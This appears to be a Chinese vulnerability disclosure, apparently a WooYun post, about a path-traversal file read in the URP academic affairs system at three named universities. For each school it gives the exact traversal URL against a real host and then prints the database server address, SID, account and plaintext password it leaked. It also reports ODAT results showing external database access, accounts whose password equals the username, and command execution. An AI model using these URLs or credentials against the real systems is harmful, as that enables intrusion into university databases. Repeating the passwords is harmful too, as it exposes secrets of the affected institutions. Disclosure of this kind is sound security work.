青岛理工大学:
发现:URP教务系统文件读取漏洞
读取地址:
http://211.64.192.44:8080/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf
========================================================
读取到:
Server:211.64.192.42
Sid:JW
Accout:newjw
Password:qtechedu001newjw
外网居然可以连接,图片wooyun传不上,Oracle sql handler连接上的图片就不传了。
用ODAT测试一下可用功能和账号与密码相同的账号:
ODAT连接测试结果作为漏洞证明。
ODAT:
ODAT测试结果:无账号与密码相同的账号
可读文件,获得hash密码,执行命令,扫描端口等
太原理工大学:
发现:URP教务系统文件读取漏洞
读取地址:
http://jwcurp.tyut.edu.cn:8064/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf
========================================================
读取到:
Server:202.207.247.43
Sid:orcl
Accout:newjw
Password:tyut2013newjwgwJWC
外网居然可以连接,图片wooyun传不上,Oracle sql handler连接上的图片就不传了。
ODAT连接测试结果作为漏洞证明。
ODAT:
ODAT测试结果:无账号与密码相同的账号
可读文件
东北农业大学:
发现:URP教务系统文件读取漏洞
读取地址:
http://202.118.167.85/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf
========================================================
读取到:
Server:202.118.167.87
Sid:urpjw
Accout:newjw
Password:newjw
外网居然可以连接,图片wooyun传不上,Oracle sql handler连接上的图片就不传了。
ODAT连接测试结果作为漏洞证明。
ODAT:
ODAT测试结果:账号与密码相同的账号 -> {'NEWJWZD', 'WWWCJLR', 'WEB_BKS','JXPG', 'WWWBKS', 'CWSF', 'NEWJWBLOB', 'NEWJW', 'JW_ZX'}
可读文件,获得hash密码,执行命令,扫描端口等